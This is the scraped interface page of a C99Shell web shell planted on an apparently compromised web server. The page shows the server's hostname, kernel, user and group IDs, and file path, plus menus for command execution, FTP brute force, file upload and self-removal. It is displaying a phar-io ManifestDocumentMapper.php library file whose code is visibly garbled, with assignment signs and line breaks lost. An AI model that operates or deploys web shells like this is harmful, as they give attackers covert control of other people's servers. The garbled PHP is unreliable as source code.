!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/phar-io/manifest/src/   drwxr-xr-x
Free 28.49 GB of 117.98 GB (24.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ManifestDocumentMapper.php (4.91 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php declare(strict_types 1);
/*
 * This file is part of PharIo\Manifest.
 *
 * (c) Arne Blankerts <arne@blankerts.de>, Sebastian Heuer <sebastian@phpeople.de>, Sebastian Bergmann <sebastian@phpunit.de>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */
namespace PharIo\Manifest;

use 
PharIo\Version\Exception as VersionException;
use 
PharIo\Version\Version;
use 
PharIo\Version\VersionConstraintParser;

class 
ManifestDocumentMapper {
    public function 
map(ManifestDocument $document): Manifest {
        try {
            
$contains          $document->getContainsElement();
            
$type              $this->mapType($contains);
            
$copyright         $this->mapCopyright($document->getCopyrightElement());
            
$requirements      $this->mapRequirements($document->getRequiresElement());
            
$bundledComponents $this->mapBundledComponents($document);

            return new 
Manifest(
                new 
ApplicationName($contains->getName()),
                new 
Version($contains->getVersion()),
                
$type,
                
$copyright,
                
$requirements,
                
$bundledComponents
            
);
        } catch (
VersionException $e) {
            throw new 
ManifestDocumentMapperException($e->getMessage(), (int)$e->getCode(), $e);
        } catch (
Exception $e) {
            throw new 
ManifestDocumentMapperException($e->getMessage(), (int)$e->getCode(), $e);
        }
    }

    private function 
mapType(ContainsElement $contains): Type {
        switch (
$contains->getType()) {
            case 
'application':
                return 
Type::application();
            case 
'library':
                return 
Type::library();
            case 
'extension':
                return 
$this->mapExtension($contains->getExtensionElement());
        }

        throw new 
ManifestDocumentMapperException(
            
\sprintf('Unsupported type %s'$contains->getType())
        );
    }

    private function 
mapCopyright(CopyrightElement $copyright): CopyrightInformation {
        
$authors = new AuthorCollection();

        foreach (
$copyright->getAuthorElements() as $authorElement) {
            
$authors->add(
                new 
Author(
                    
$authorElement->getName(),
                    new 
Email($authorElement->getEmail())
                )
            );
        }

        
$licenseElement $copyright->getLicenseElement();
        
$license        = new License(
            
$licenseElement->getType(),
            new 
Url($licenseElement->getUrl())
        );

        return new 
CopyrightInformation(
            
$authors,
            
$license
        
);
    }

    private function 
mapRequirements(RequiresElement $requires): RequirementCollection {
        
$collection = new RequirementCollection();
        
$phpElement $requires->getPHPElement();
        
$parser     = new VersionConstraintParser;

        try {
            
$versionConstraint $parser->parse($phpElement->getVersion());
        } catch (
VersionException $e) {
            throw new 
ManifestDocumentMapperException(
                
\sprintf('Unsupported version constraint - %s'$e->getMessage()),
                (int)
$e->getCode(),
                
$e
            
);
        }

        
$collection->add(
            new 
PhpVersionRequirement(
                
$versionConstraint
            
)
        );

        if (!
$phpElement->hasExtElements()) {
            return 
$collection;
        }

        foreach (
$phpElement->getExtElements() as $extElement) {
            
$collection->add(
                new 
PhpExtensionRequirement($extElement->getName())
            );
        }

        return 
$collection;
    }

    private function 
mapBundledComponents(ManifestDocument $document): BundledComponentCollection {
        
$collection = new BundledComponentCollection();

        if (!
$document->hasBundlesElement()) {
            return 
$collection;
        }

        foreach (
$document->getBundlesElement()->getComponentElements() as $componentElement) {
            
$collection->add(
                new 
BundledComponent(
                    
$componentElement->getName(),
                    new 
Version(
                        
$componentElement->getVersion()
                    )
                )
            );
        }

        return 
$collection;
    }

    private function 
mapExtension(ExtensionElement $extension): Extension {
        try {
            
$versionConstraint = (new VersionConstraintParser)->parse($extension->getCompatible());

            return 
Type::extension(
                new 
ApplicationName($extension->getFor()),
                
$versionConstraint
            
);
        } catch (
VersionException $e) {
            throw new 
ManifestDocumentMapperException(
                
\sprintf('Unsupported version constraint - %s'$e->getMessage()),
                (int)
$e->getCode(),
                
$e
            
);
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0056 ]--